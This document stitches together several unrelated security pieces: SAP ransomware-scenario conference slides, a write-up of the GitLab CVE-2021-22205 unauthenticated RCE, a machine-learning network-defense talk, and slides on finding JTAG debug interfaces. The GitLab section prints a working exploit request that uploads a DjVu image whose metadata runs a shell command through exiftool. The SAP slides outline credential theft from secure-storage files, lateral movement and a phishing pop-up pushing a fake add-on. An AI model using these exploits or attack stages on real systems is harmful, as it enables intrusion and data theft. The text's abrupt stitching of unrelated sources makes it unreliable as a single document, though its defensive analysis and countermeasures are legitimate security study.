(in SAP, that is no easy tasks) • By studying past ransomwares, we discovered that most of them shared some “personality traits” • They were designed to hit hard • Quick lateral movement was gold • Avoiding “making noise” was not a priority • Open to “weaponize” (aka reutilize) previously reported vulnerabilities WEAPONIZATION “The Ransomware Approach” - Scenario DMZ INTERNAL NETWORK Front-End SAP Java Back-End SAP ABAP Attacker WEAPONIZATION “The Ransomware Approach” • The hypothetical malware will be divided in 5 phases • Each action / stage will be complemented with the technical attack / technique and the respective countermeasure • The full Ransomware / Malware wont be distributed for obvious reasons ;-) but we will show some code! Stage Action Intrusion Remote Command Execution via SAP Java Invoker Servlet Credential Gathering Decrypting SAP Secure Storage Lateral Movement Around DMZ SSH / Password Guessing / Brute-force via RFC DMZ Escape / Lateral Movement Around Adjacent Network Credential Reutilization using SOAPRFC / Master Password Ransom & Expansion Encrypt all the things!!! And bonus! WEAPONIZATION “The Ransomware Approach” - Intrusion • As other malwares like WannaCry, we will use a previously reported vulnerability and just weaponize the publicly available exploit. This makes sense as many sophisticated attackers already have “malware frameworks”, they just need a silver bullet and some vulnerable victims • Per our network diagram, on the first phase, we are going to take over the front-end SAP system that is located inside the DMZ • The exploit that we are going to use will allow us to execute operating system commands under the privileges of the operating system user that is running the SAP system. This vulnerability is due to a combination of a default misconfiguration and a security vulnerability in SAP • Modern versions of SAP are not vulnerable to this exploit, but according to our research, finding a vulnerable systems is easy enough (almost 3 out of 10!!!!) PREVENTION “The Ransomware Approach” - Countermeasures • To prevent the abuse of the InvokerServlet and the unauthenticated command execution, SAP Notes 1445998, 1589525 and 1624450 must be implemented on the affected assets • After the SAP security notes have been implemented, you need to be sure that the Invoker Servlet functionality is globally disabled. For that, use the SAP Java config-tool or open the Netweaver administrator webpage (nwa), go to Server Configurations, locate the servlet_jsp option and make sure EnableInvokerServletGlobally is set to False • WARNING !!! There is a known issue / bug in SAP that will prevent old versions to start after implementing this fix. Please read SAP Note 1467771, before disabling the InvokerServlet • Unfortunately, changes will only take effect once you restart your SAP systems WEAPONIZATION “The Ransomware Approach” – Getting some creds! • Once the ransomware’s target has been breached, the first thing that it needs to do is lateral movement • The easiest way to extract credentials from a SAP Java system is by opening an encrypted file called SAP J2EE Secure Storage • In the SAP Java systems, the secure storage is an encrypted container that lays on the file-system. 
This container is encrypted using 3-DES, a hardcoded key and an user key phrase which is defined at the installation time • The container holds the SAP’s database password and depending on the version, the SAP Java administrator password (which is usually the same one, aka Master Password) • The container is extremely trivial to decrypt …….. PREVENTION “The Ransomware Approach” – Countermeasures • Access to the SAP J2EE Secure Storage must be protected at all cost! • Files: Should only be accessible by the SAP’s operating system user, local administrators and global admins • Our selected encryption key phrase must be different from the SAP master password • The password for the SAP Administrator must be different from the SAP database user • /usr/sap/<SID>/SYS/global/security/data/SecStore.properties, • /usr/sap/<SID>/SYS/global/security/data/SecStore.key WEAPONIZATION “The Ransomware Approach” - Scenario DMZ INTERNAL NETWORK Front-End SAP Java Back-End SAP ABAP Attacker WEAPONIZATION “The Ransomware Approach” – Getting some creds! • The ransomware now has the ability to execute operating system commands under the privileges of the user running the SAP system, has full access to the local database and some important credentials for an eventual brute force • But this is not all….. In order to connect to other SAP systems of “different stacks” the SAP Java systems have a mechanism called JCO Destinations, these destinations might contain sensitive data such as client, username and password for remote systems (inside or outside the DMZ) • Finally, we should always test if the passwords that we got so far correspond to the SAP Master Password. We could do this via SSH or SMB WEAPONIZATION “The Ransomware Approach” – Master Password! • At the installation time, SAP will ask the user if he / she wants to assign a different password for the most important SAP accounts or use a Master Password • By default, the installer suggests the implementation of a Master Password • If the Master Password is selected, the most powerful SAP users like SAP*, DDIC, the SAP’s database user and the SAP OS administrator and the SAP OS service user will all share the same password • 95% of the surveyed companies use the SAP Master Password mechanism • If one password is compromised …. “A Screen that no one wants to see on their SAPs” THE FINAL RESULT PREVENTION “The Ransomware Approach” – Countermeasures • In order to protect your RFC destinations, first ask yourself the following question, do I have a real business need to create an RFC destination with hardcoded credentials? • If the answer is “Yes” because you need to interact with a poorly designed interface (quite common on the SAP world) the least privileged approach must be follow • Avoid the utilization of an SAP Master Password, each key account must have its own password, with such be in compliance to your local password policy • Review your firewall strategy, how are you connecting your SAP systems on the DMZ and from the DMZ to the adjacent network. Allow traffic to ONLY the services that you require and nothing else WEAPONIZATION “The Ransomware Approach” - Scenario DMZ INTERNAL NETWORK Front-End SAP Java Back-End SAP ABAP Attacker WEAPONIZATION “The Ransomware Approach” – Bonus Track • Now is time to leave the DMZ!. 
One of the most notable characteristics of SAP is that it was born to be interconnected
• We can safely assume that the RFC and ICM ports will be accepting connections from the already compromised SAP systems on the DMZ
• The malware will attack the ICM services on the adjacent network by trying to reuse the obtained credentials. The attack will target a particularly vulnerable service called SOAPRFC
• The malware will send fake messages from the SAP servers on the adjacent network to all the end users (human beings), pretending to be the SAP administrators
• The users will receive a pop-up saying that a new SAP add-on MUST be installed, and that if they do not proceed with the installation they will “disrupt the SAP system”

WHAT DID WE LEARN TODAY?
A Few Take-Aways …
• Always ask yourself: do I really need to expose my SAP system to the Internet? If the answer is yes, you must ONLY expose the bare minimum
• Use an SAP Web Dispatcher to restrict access to ALL the webpages that are not required by the business
• Your Internet-facing SAP systems must be patched! Follow SAP's security notes release cycle! (New patches are available the second Tuesday of each month)
• Do not forget about the audit trails! They will be invaluable in case the worst happens
• Make sure your SOC is “SAP aware”
• And finally….. Prevent, Prevent, Prevent: conduct penetration tests regularly, distrust default configurations and always use the least-privilege approach when in doubt! It will pay off in the future!

WRAPPING-UP
THAT IS ALL… QUESTIONS?
To find out more about SAP, visit us at https://vicxer.com or follow us on Twitter @JSANTARSIERI @VICXERSECURITY
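The take-aways above boil down to knowing exactly what your Internet-facing SAP host answers on. As a rough illustration only, a sketch like the following could be used to inventory which web paths a NetWeaver host actually responds to; the path list is a generic example, not an authoritative list of sensitive SAP services.

```python
import requests

# Example paths often present on NetWeaver installations -- adjust to your landscape.
CANDIDATE_PATHS = [
    "/",                 # ICM / AS Java start page
    "/irj/portal",       # Enterprise Portal
    "/sap/public/info",  # ABAP public info service
    "/nwa",              # NetWeaver Administrator (should never be Internet-facing)
]

def survey(base_url):
    """Return the candidate paths that answer with something other than an error."""
    exposed = []
    for path in CANDIDATE_PATHS:
        try:
            r = requests.get(base_url + path, timeout=5, allow_redirects=False, verify=False)
        except requests.RequestException:
            continue
        if r.status_code < 400:
            exposed.append((path, r.status_code))
    return exposed

if __name__ == "__main__":
    for path, code in survey("https://sap.example.com"):
        print(f"reachable: {path} (HTTP {code})")
```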
CVE-2021-22205: GitLab unauthenticated RCE — analysis, parts 1, 2 and 3

1. Background
2. Where exiftool gets called
3. Authentication, authorization and CSRF
4. Extended exploitation

This started because another researcher asked me about it in a private message, so I spent the weekend digging into it. Part 3 of this write-up is an extension built on top of this analysis; compared with the exploitation path everyone currently knows, it is both simpler and more generic. That part will be published separately tomorrow.

0. Background

Searching GitHub (https://github.com/search?q=CVE-2021-22205), the second request of the well-known upload flow that the vast majority of people use looks roughly like this:

```http
POST /uploads/user HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
Accept-Encoding: gzip, deflate
Accept: application/json
Connection: close
X-CSRF-Token: g0heOBs+YzUAWceQolmjKrXO8nGNJkRV3oXYrnOkECztLMEGnoLeLmeDsR6MorfD2UIRO1Pt8TsXFOB70NCTwQ==
Referer: http://127.0.0.1:3000//uploads/user
Cookie: _gitlab_session_af96fb58ed2fa1b0750f77450f6ea19a32b8a66817cff2290ccd5d460dda8777=8a02e014393906f0bff9fc22a2e2bc6e; experimentation_subject_id=eyJfcmFpbHMiOnsibWVzc2FnZSI6IkltRXdOREk1TWpJNExXRTBZVFV0TkdVNE9DMWlOekF4TFRJMlpUYzJNV1k1WlRNd1pTST0iLCJleHAiOm51bGwsInB1ciI6ImNvb2tpZS5leHBlcmltZW50YXRpb25fc3ViamVjdF9pZCJ9fQ%3D%3D--42e8f07fbe964e06f9700f975a122a4dcb59fdc5; perf_bar_enabled=true
Content-Length: 305
Content-Type: multipart/form-data; boundary=6dd36a93b958b399f3e98685816fadfa

--6dd36a93b958b399f3e98685816fadfa
Content-Disposition: form-data; name="file"; filename="b9c18b38-3e5d-11ec-b93b-1c36bbed31f3.jpg"
Content-Type: image/jpeg

AT&TFORM[DJVUINFO , BGjpANTa5(metadata (Copyright "\ " . qx{whoami} . \ " b ") )
--6dd36a93b958b399f3e98685816fadfa--
```

Looking at this request, two questions come to mind immediately:

1. How does GitLab end up invoking exiftool?
2. How is the /uploads/user endpoint authenticated and authorized, and what about CSRF?

The patch lands in workhorse/internal/upload/rewrite.go:180.

1. Where exiftool gets called

In handleExifUpload, the patch adds new checks on the uploaded image: the jpeg format check and the exif check.

From the screenshot above you can see the relevant line of code in gitlab-workhorse. At workhorse/internal/upload/exif/exif.go:34, when startProcessing handles the upload, exiftool is invoked — and that is what triggers the RCE.

```go
cleaner, err := exif.NewCleaner(ctx, r)
```

So, for anyone doing intrusion detection: the parent command that actually gets executed is

```
/usr/bin/perl -w /opt/gitlab/embedded/bin/exiftool -all= --IPTC:all --XMP-iptcExt:all -tagsFromFile @ -ResolutionUnit -XResolution -YResolution -YCbCrSubSampling -YCbCrPositioning -BitsPerSample -ImageHeight -ImageWidth -ImageSize -Copyright -CopyrightNotice -Orientation -
```

Walking the call chain back step by step, it traces up to the Accelerate function at accelerate.go:20:

```
workhorse/internal/upload/accelerate.go:20 Accelerate
uploads.go: HandleFileUploads
rewrite.go: rewriteFormFilesFromMultipart
rewrite.go: handleFilePart
rewrite.go: handleExifUpload
rewrite.go: exif.NewCleaner
exif.go: NewCleaner
exif.go: startProcessing
```

2. Authentication, authorization and CSRF

Starting again from the request, POST /uploads/user HTTP/1.1 is handled by the route registered in gitlab-workhorse at workhorse/internal/upstream/routes.go:333:

```go
u.route("POST", userUploadPattern, upload.Accelerate(api, signingProxy, preparers.uploads)),
```

So let's look at workhorse/internal/upload/accelerate.go:20, where Accelerate is invoked. The arguments passed to upload.Accelerate are, respectively:

```go
api               => api := u.APIClient
signingProxy      => signingProxy := buildProxy(u.Backend, u.Version, signingTripper, u.Config, dependencyProxyInjector)
preparers.uploads => preparers := createUploadPreparers(u.Config)

func createUploadPreparers(cfg config.Config) uploadPreparers {
	defaultPreparer := upload.NewObjectStoragePreparer(cfg)

	return uploadPreparers{
		artifacts: defaultPreparer,
		lfs:       lfs.NewLfsUploadPreparer(cfg, defaultPreparer),
		packages:  defaultPreparer,
		uploads:   defaultPreparer,
	}
}
```

Here I have reformatted Accelerate's code a bit so the relevant parameters and the corresponding callback are easier to see:

```go
func Accelerate(rails PreAuthorizer, h http.Handler, p Preparer) http.Handler {
	return rails.PreAuthorizeHandler(
		func(w http.ResponseWriter, r *http.Request, a *api.Response) {
			s := &SavedFileTracker{Request: r}

			opts, _, err := p.Prepare(a)
			if err != nil {
				helper.Fail500(w, r, fmt.Errorf("Accelerate: error preparing file storage options"))
				return
			}

			HandleFileUploads(w, r, h, a, s, opts)
		},
		"/authorize",
	)
}
```

So the thing to focus on is PreAuthorizeHandler on u.APIClient. Here u is the upstream struct (its definition is shown in the screenshot), and in workhorse/internal/api.go / upstream.go we have the following:

```go
import (
	...
	apipkg "gitlab.com/gitlab-org/gitlab/workhorse/internal/api"
	...
)

func newUpstream(
	...
	up.APIClient = apipkg.NewAPI(
		up.Backend,
		up.Version,
		up.RoundTripper,
	)
	...
)
```

Excerpting the call made inside Accelerate over here, it corresponds to PreAuthorizeHandler in api.go:

```go
func (api *API) PreAuthorizeHandler(next HandleFunc, suffix string) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		httpResponse, authResponse, err := api.PreAuthorize(suffix, r)
		if httpResponse != nil {
			defer httpResponse.Body.Close()
		}
		if err != nil {
			helper.Fail500(w, r, err)
			return
		}

		// The response couldn't be interpreted as a valid auth response, so
		// pass it back (mostly) unmodified
		if httpResponse != nil && authResponse == nil {
			passResponseBack(httpResponse, w, r)
			return
		}

		httpResponse.Body.Close() // Free up the Puma thread

		copyAuthHeader(httpResponse, w)

		next(w, r, authResponse)
	})
}
```

In other words, the parameters map as follows — next is the upload-handling closure, and suffix is "/authorize":

```go
next => func(w http.ResponseWriter, r *http.Request, a *api.Response) {
	s := &SavedFileTracker{Request: r}

	opts, _, err := p.Prepare(a)
	if err != nil {
		helper.Fail500(w, r, fmt.Errorf("Accelerate: error preparing file storage options"))
		return
	}

	HandleFileUploads(w, r, h, a, s, opts)
},

suffix => "/authorize"
```

Stepping into PreAuthorize, which PreAuthorizeHandler calls:

```go
httpResponse, authResponse, err := api.PreAuthorize(suffix, r)
```

```go
// PreAuthorize performs a pre-authorization check against the API for the given HTTP request
//
// If `outErr` is set, the other fields will be nil and it should be treated as
// a 500 error.
//
// If httpResponse is present, the caller is responsible for closing its body
//
// authResponse will only be present if the authorization check was successful
func (api *API) PreAuthorize(suffix string, r *http.Request) (httpResponse *http.Response, authResponse *Response, outErr error) {
	authReq, err := api.newRequest(r, suffix)
	if err != nil {
		return nil, nil, fmt.Errorf("preAuthorizeHandler newUpstreamRequest: %v", err)
	}

	httpResponse, err = api.doRequestWithoutRedirects(authReq)
	if err != nil {
		return nil, nil, fmt.Errorf("preAuthorizeHandler: do request: %v", err)
	}
	defer func() {
		if outErr != nil {
			httpResponse.Body.Close()
			httpResponse = nil
		}
	}()
	requestsCounter.WithLabelValues(strconv.Itoa(httpResponse.StatusCode), authReq.Method).Inc()

	// This may be a false positive, e.g. for .../info/refs, rather than a
	// failure, so pass the response back
	if httpResponse.StatusCode != http.StatusOK || !validResponseContentType(httpResponse) {
		return httpResponse, nil, nil
	}

	authResponse = &Response{}
	// The auth backend validated the client request and told us additional
	// request metadata. We must extract this information from the auth
	// response body.
	if err := json.NewDecoder(httpResponse.Body).Decode(authResponse); err != nil {
		return httpResponse, nil, fmt.Errorf("preAuthorizeHandler: decode authorization response: %v", err)
	}

	return httpResponse, authResponse, nil
}
```

api.newRequest(r, suffix) assembles the headers, and finally an API request is sent to the authorize endpoint. The component that receives and handles this API request is the uploads action in GitLab's rails-web component. (Note: Rails is an MVC framework; look up actions, controllers and so on yourself if you need the background.)

The action code is as follows, in app/controllers/concerns/uploads_actions.rb:

```ruby
module UploadsActions
  def authorize
    set_workhorse_internal_api_content_type

    authorized = uploader_class.workhorse_authorize(
      has_length: false,
      maximum_size: Gitlab::CurrentSettings.max_attachment_size.megabytes.to_i)

    render json: authorized
  rescue SocketError
    render json: _("Error uploading file"), status: :internal_server_error
  end

  def model
    strong_memoize(:model) { find_model }
  end

  ...

  def workhorse_authorize_request?
    action_name == 'authorize'
  end
end
```

The corresponding controller is shown below (https://guides.rubyonrails.org/action_controller_overview.html):

```ruby
class UploadsController < ApplicationController
  skip_before_action :authenticate_user!
  skip_before_action :check_two_factor_requirement, only: [:show]
  before_action :upload_mount_satisfied?
  before_action :authorize_access!, only: [:show]
  before_action :authorize_create_access!, only: [:create, :authorize]
  before_action :verify_workhorse_api!, only: [:authorize]

  def authorize_create_access!
    return unless model

    authorized =
      case model
      when User
        can?(current_user, :update_user, model)
      else
        can?(current_user, :create_note, model)
      end

    render_unauthorized unless authorized
  end
```

A Rails controller can have multiple filters inserted, so:

```ruby
# This uploads controller does NOT require login!
skip_before_action :authenticate_user!

# For the create action or the authorize action, authorize_create_access! runs before the action
before_action :authorize_create_access!, only: [:create, :authorize]

# For the authorize action, verify_workhorse_api! runs before the action
before_action :verify_workhorse_api!, only: [:authorize]
```

Judging from GitLab's official documentation (https://docs.gitlab.com/ee/security/user_file_uploads.html), this is also intentional: images and the like usually end up embedded in things such as emails that have to be readable, so by default image-type files can be uploaded without any authorization.

Before the fix — in the screenshot, the left side is unpatched and the right side has the patch applied. The abbreviated call chain is:

```ruby
uploads_controller: authorize_create_access > return unless model
uploads_actions:    model > strong_memoize(:model) { find_model }
uploads_controller: find_model > return unless params[:id]
```

And since the parameters do not carry an id, the checks simply return all the way through, and the corresponding action is then invoked.

So no error occurs anywhere in this process. Going back to PreAuthorizeHandler in api.go, excerpted again here:

```go
func (api *API) PreAuthorizeHandler(next HandleFunc, suffix string) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		httpResponse, authResponse, err := api.PreAuthorize(suffix, r)
		if httpResponse != nil {
			defer httpResponse.Body.Close()
		}
		if err != nil {
			helper.Fail500(w, r, err)
			return
		}

		// The response couldn't be interpreted as a valid auth response, so
		// pass it back (mostly) unmodified
		if httpResponse != nil && authResponse == nil {
			passResponseBack(httpResponse, w, r)
			return
		}

		httpResponse.Body.Close() // Free up the Puma thread

		copyAuthHeader(httpResponse, w)

		next(w, r, authResponse)
	})
}
```

After api.go in gitlab-workhorse finishes the request to /uploads/user/authorize, the uploads controller in rails-web renders and returns its data; gitlab-workhorse takes the returned information and sets authResponse. The next value is shown below — it contains HandleFileUploads, i.e. the exif image handling that is the trigger point for calling exiftool:

```go
next => func(w http.ResponseWriter, r *http.Request, a *api.Response) {
	s := &SavedFileTracker{Request: r}

	opts, _, err := p.Prepare(a)
	if err != nil {
		helper.Fail500(w, r, fmt.Errorf("Accelerate: error preparing file storage options"))
		return
	}

	HandleFileUploads(w, r, h, a, s, opts)
},
```

And with that, the whole RCE chain has been exercised end to end.

So in real-world engagements, when POST /uploads/user returns 404 it is because the code already contains the September commit: if it finds that no id was passed in, it raises an error right away and does not go any further.

As for CSRF: because the API request is sent to the Rails-web backend, it already benefits from CSRF protection — see lib/gitlab/request_forgery_protection.rb:7; for the vast majority of requests, CSRF protection is required by default. That is why, for the PoC that circulated at the beginning, the first step is naturally to visit the home page and obtain the _gitlab_session cookie and the X-CSRF-Token value.

3. Extended exploitation

This part is only published on my Knowledge Planet group — thanks for reading: https://public.zsxq.com/groups/555848225184.html
Defending Networks with Incomplete Information: A Machine Learning Approach Alexandre Pinto alexcp@mlsecproject.org @alexcpsec @MLSecProject • This is a talk about DEFENDING not attacking – NO systems were harmed on the development of this talk. – We are actually trying to BUILD something here. • This talk includes more MATH than the daily recommended intake by the FDA. • You have been warned... ** WARNING ** • 12 years in Information Security, done a little bit of everything. • Past 7 or so years leading security consultancy and monitoring teams in Brazil, London and the US. – If there is any way a SIEM can hurt you, it did to me. • Researching machine learning and data science in general for the past year or so. Participates in Kaggle machine learning competitions (for fun, not for profit). • First presentation at DefCon! (where is my shot?) Who’s this guy? • Security Monitoring: We are doing it wrong • Machine Learning and the Robot Uprising • Data gathering for InfoSec • Case study: Model to detect malicious activity from log data • MLSec Project • Attacks and Adversaries • Future Direction Agenda • Logs, logs everywhere The Monitoring Problem • Logs, logs everywhere The Monitoring Problem • SANS Eighth Annual 2012 Log and Event Management Survey Results (http:// www.sans.org/reading_room/analysts_program/SortingThruNoise.pdf) Are these the right tools for the job? • SANS Eighth Annual 2012 Log and Event Management Survey Results (http:// www.sans.org/reading_room/analysts_program/SortingThruNoise.pdf) Are these the right tools for the job? • Rules in a SIEM solution invariably are: – “Something” has happened “x” times; – “Something” has happened and other “something2” has happened, with some relationship (time, same fields, etc) between them. • Configuring SIEM = iterate on combinations until: – Customer or management is fooled satisfied; or – Consulting money runs out • Behavioral rules (anomaly detection) helps a bit with the “x”s, but still, very laborious and time consuming. Correlation Rules: a Primer • However, there are individuals who will do a good job • How many do you know? • DAM hard (ouch!) to find these capable professionals Not exclusively a tool problem • How many of these very qualified professionals will we need? • How many know/ will learn statistics, data analysis, data science? Next up: Big Data Technologies We need an Army! Of ROBOTS! • “Machine learning systems automatically learn programs from data” (*) • You don’t really code the program, but it is inferred from data. • Intuition of trying to mimic the way the brain learns: that’s where terms like “artificial intelligence” come from. Enter Machine Learning (*) CACM 55(10) - A Few Useful Things to Know about Machine Learning • Sales Applications of Machine Learning • Trading • Image and Voice Recognition Security Applications of ML • Fraud detection systems: – Is what he just did consistent with past behavior? • Network anomaly detection (?): – NOPE! – More like statistical analysis, bad one at that • SPAM filters - Remember the “Bayesian filters”? There you go. - How many talks have you been hearing about SPAM filtering lately? 
;) • Supervised Learning: – Classification (NN, SVM, Naïve Bayes) – Regression (linear, logistic) Kinds of Machine Learning Source – scikit-learn.github.io/scikit-learn-tutorial/ • Unsupervised Learning : – Clustering (k-means) – Decomposition (PCA, SVD) Considerations on Data Gathering • “I’ve got 99 problems, but data ain’t one” • Models will (generally) get better with more data – We always have to consider bias and variance as we select our data points – Also adversaries – we may be force-fed “bad data”, find signal in weird noise or design bad (or exploitable) features Domingos, 2012 Abu-Mostafa, Caltech, 2012 Considerations on Data Gathering • Adversaries - Exploiting the learning process • Understand the model, understand the machine, and you can circumvent it • Something InfoSec community knows very well • Any predictive model on InfoSec will be pushed to the limit • Again, think back on the way SPAM engines evolved. Designing a model to detect external agents with malicious behavior • We’ve got all that log data anyway, let’s dig into it • Most important (and time consuming) thing is the “feature engineering” • We are going to go through one of the algorithms I have put together as part of my research Model: Data Collection • Firewall block data from SANS DShield (per day) • Firewalls, really? Yes, but could be anything. • We get summarized “malicious” data per port • Number of aggregated events (orange) • Number of log entries before aggregation (purple) Model Intuition: Proximity • Assumptions to aggregate the data • Correlation / proximity / similarity BY BEHAVIOR • “Bad Neighborhoods” concept: – Spamhaus x CyberBunker – Google Report (June 2013) – Moura 2013 • Group by Netblock (/16, /24) • Group by ASN – (thanks, Team Cymru) Map of the Internet (Hilbert Curve) Block port 22 2013-07-20 Notice the clustering behaviour? 0 10 127 MULTICAST AND FRIENDS You are Here Map of the Internet (Hilbert Curve) Block port 22 2013-07-20 Notice the clustering behaviour? 0 10 127 MULTICAST AND FRIENDS CN RU CN, BR, TH You are Here Be careful with confirmation bias Country codes are not enough for any prediction power of consequence today Model Intuition: Temporal Decay • Even bad neighborhoods renovate: – Atackers may change ISPs/proxies – Botnets may be shut down / relocate – A little paranoia is Ok, but not EVERYONE is out to get you (at least not all at once) • As days pass, let’s forget, bit by bit, who attacked • A Half-Life decay function will do just fine Model Intuition: Temporal Decay Model: Calculate Features • Cluster your data: what behavior are you trying to predict? • Create “Badness” Rank = lwRank (just because) • Calculate normalized ranks by IP, Netblock (16, 24) and ASN • Missing ASNs and Bogons (we still have those) handled separately, get higher ranks. Model: Calculate Features • We will have a rank calculation per day: – Each “day-rank” will accumulate all the knowledge we gathered on that IP, Netblock and ASN to that day – Decay previous “day-rank” and add today’s results • Training data usually spans multiple days • Each entry will have its date: – Use that “day-rank” – NO cheating ---------> – Survivorship bias issues! 
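The "decay previous day-rank and add today's results" rule above maps to a one-line update. The sketch below is only illustrative — the talk does not disclose the actual half-life or the normalization used in lwRank.

```python
HALF_LIFE_DAYS = 7.0                      # assumption; the deck doesn't give the real value
DECAY = 0.5 ** (1.0 / HALF_LIFE_DAYS)     # per-day multiplier, so the rank halves every 7 days

def next_day_rank(previous_rank, todays_badness):
    """Forget a little of who attacked us, then add today's aggregated block observations."""
    return previous_rank * DECAY + todays_badness

# A /24 that shows up in the DShield block data for three days, then goes quiet:
rank = 0.0
for observed in [1.0, 1.0, 1.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0]:
    rank = next_day_rank(rank, observed)
    print(round(rank, 3))
```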
Model: Example Feature (1) • Block on Port 3389 (IP address only) – Horizontal axis: lwRank from 0 (good/neutral) to 1 (very bad) – Vertical axis: log10(number of IPs in model) Model: Example Feature (2) • Block on Port 22 (IP address only) – Horizontal axis: lwRank from 0 (good/neutral) to 1 (very bad) – Vertical axis: log10(number of IPs in model) How are we doing so far? Training the Model • YAY! We have a bunch of numbers per IP address! • We get the latest blocked log files (SANS or not): – We have “badness” data on IP Addresses - features – If they were blocked, they are “malicious” - label • Now, for each behavior to predict: – Create a dataset with “enough” observations: – Rule of Thumb: 70k - 120k is good because of empirical dimensionality. Negative and Positive Observations • We also require “non-malicious” IPs! • If we just feed the algorithms with one label, they will get lazy. • CHEAP TRICK: Everything is “malicious” - trivial solution • Gather “non-malicious” IP addresses from Alexa and Chromium Top 1m Sites. SVM FTW! • Use your favorite algorithm! YMMV. • I chose Support Vector Machines (SVM): – Good for classification problems with numeric features – Not a lot of features, so it helps control overfitting, built in regularization in the model, usually robust – Also awesome: hyperplane separation on an unknown infinite dimension. Jesse Johnson – shapeofdata.wordpress.com No idea… Everyone copies this one Results: Training/Test Data • Model is trained on each behavior for each day • Training accuracy* (cross-validation): 83 to 95% • New data - test accuracy*: – Training model on day D, predicting behavior in day D+1 – 79 to 95%, roughly increasing over time (*)Accuracy = (things we got right) / (everything we tried) Results: Training/Test Data Results: Training/Test Data Results: New Data • How does that help? • With new data we can verify the labels, we find: – 70 – 92% true positive rate (sensitivity/precision) – 95 – 99% true negative rate (specificity/recall) • This means that (odds likelihood calculation): – If the model says something is “bad”, it is 13.6 to 18.5 times MORE LIKELY to be bad. • Think about this. • Wouldn’t you rather have your analysts look at these first? Remember the Hilbert Curve? • Behavior: block on port 22 • Trial inference on 100k IP addresses per Class A subnet • Logarithm scale: brightest tiles are 10 to 1000 times more likely to attack. Remember the Hilbert Curve? • Behavior: block on port 22 • Trial inference on 100k IP addresses per Class A subnet • Logarithm scale: brightest tiles are 10 to 1000 times more likely to attack. Attacks and Adversaries • IP addresses are not as reliable as they could be: – Forget about UDP – Lowest possible value for DFIR • This is not attribution, this is defense • Challenges: – Anonymous proxies (not really, same rules apply) – Tor (less clustering behavior on exit nodes) – Fast-flux Tor - 15~30 mins • Process was designed with different actors in mind as well, given they can be clustered in some way. Future Direction • As is, the results from the predictions can help Security Analysts on tiers 1 and 2 of SOCs: – You can’t “eyeball” all of the data. 
– Makes the deluge of logs produce something actionable • The real kicker is when we compose algorithms (ensemble): – Web server -> go through firewall, then IPS, then WAF – Increased precision by composing different behaviors • Given enough predictive power (increased likelihood): – Implement an SDN system that sends detected attackers through a “longer path” or to a Honeynet – Connection could be blocked immediately Final Remarks • Sign up, send logs, receive reports generated by machine learning models! – FREE! I need the data! Please help! ;) • Looking for contributors, ideas, skeptics to support project as well. • Please visit https://www.mlsecproject.org , message @MLSecProject or just e-mail me. • Machine learning can assist monitoring teams in data- intensive activities (like SIEM and security tool monitoring) • The odds likelihood ratio (12x to 18x) is proportional do the gain in efficiency on the monitoring teams. • This is just the beginning! Lots of potential! • MLSec Project is cool, check it out and sign up! Take Aways Thanks! • Q&A? • Don’t forget to submit feedback! Alexandre Pinto alexcp@mlsecproject.org @alexcpsec @MLSecProject "Prediction is very difficult, especially if it's about the future." - Niels Bohr
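To make the modeling step concrete, here is a small end-to-end sketch in the spirit of the talk: synthetic stand-ins for the lwRank features, an SVM classifier, and the resulting positive likelihood ratio. The feature distributions, sample sizes and kernel settings are invented for illustration and will not reproduce the talk's exact 13.6x–18.5x figures.

```python
import numpy as np
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC

rng = np.random.default_rng(7)
n = 5000
# Four synthetic "badness rank" features per observation (IP, /24, /16, ASN), each in [0, 1].
malicious = rng.beta(5, 2, size=(n, 4))   # blocked IPs: ranks skewed toward 1
benign    = rng.beta(2, 5, size=(n, 4))   # Alexa/Chromium top-sites: ranks skewed toward 0
X = np.vstack([malicious, benign])
y = np.hstack([np.ones(n), np.zeros(n)])

X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.3, random_state=7)
clf = SVC(kernel="rbf", C=1.0, gamma="scale").fit(X_tr, y_tr)

tn, fp, fn, tp = confusion_matrix(y_te, clf.predict(X_te)).ravel()
sensitivity = tp / (tp + fn)              # true positive rate
specificity = tn / (tn + fp)              # true negative rate
lr_plus = sensitivity / (1.0 - specificity)
print(f"TPR={sensitivity:.2f}  TNR={specificity:.2f}  LR+={lr_plus:.1f}x")
```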
Assisted Discovery of On-Chip Debug Interfaces Joe Grand (@joegrand) Introduction • On-chip debug interfaces are a well-known attack vector - Can provide chip-level control of a target device - Extract program code or data - Modify memory contents - Affect device operation on-the-fly - Gain insight into system operation • Inconvenient for vendor to remove functionality - Would prevent capability for legitimate personnel - Weak obfuscation instead (hidden or unmarked signals/connectors) - May be password protected (if supported by device) Introduction 2 • Identifying OCD interfaces can sometimes be difficult and/or time consuming Goals • Create an easy-to-use tool to simplify the process • Attract non-HW folks to HW hacking • Hunz's JTAG Finder - http://elinux.org/JTAG_Finder • JTAGenum & RS232enum - http://deadhacker.com/tools/ • Cyber Fast Track - www.cft.usma.edu Inspiration Other Art • An Open JTAG Debugger (GoodFET), Travis Goodspeed, DEFCON 17 - http://defcon.org/html/links/dc-archives/dc-17- archive.html#Goodspeed2 • Blackbox JTAG Reverse Engineering, Felix Domke, 26C3 - http://events.ccc.de/congress/2009/Fahrplan/ attachments/1435_JTAG.pdf Other Art 2 • Forensic Imaging of Embedded Systems using JTAG, Marcel Breeuwsma (NFI), Digital Investigation Journal, March 2006 - http://www.sciencedirect.com/science/article/pii/ S174228760600003X Identifying Interfaces: External • Accessible to the outside world - Intended for engineers or manufacturers - Device programming or final system test • Usually hidden or protected - Underneath batteries - Behind stickers/covers • May be a proprietary/non-standard connector Identifying Interfaces: Internal • Test points or unpopulated pads • Silkscreen markings or notation • Easy-to-access locations Identifying Interfaces: Internal 2 • Familiar target or based on common pinouts - Often single- or double-row footprint - JTAG: www.jtagtest.com/pinouts/ ← www.blackhat.com/html/bh-us-10/bh-us-10-archives.html#Jack → www.nostarch.com/xboxfree Identifying Interfaces: Internal 3 • Can use PCB/design heuristics - Traces of similar function are grouped together (bus) - Array of pull-up/pull-down resistors (to set static state of pins) - Test points usually placed on important/interesting signals ← http://elinux.org/images/d/d6/Jtag.pdf Identifying Interfaces: Internal 4 • More difficult to locate when available only on component pads or tented vias *** www.dd-wrt.com/wiki/index.php/JTAG_pinouts#Buffalo_WLA-G54C 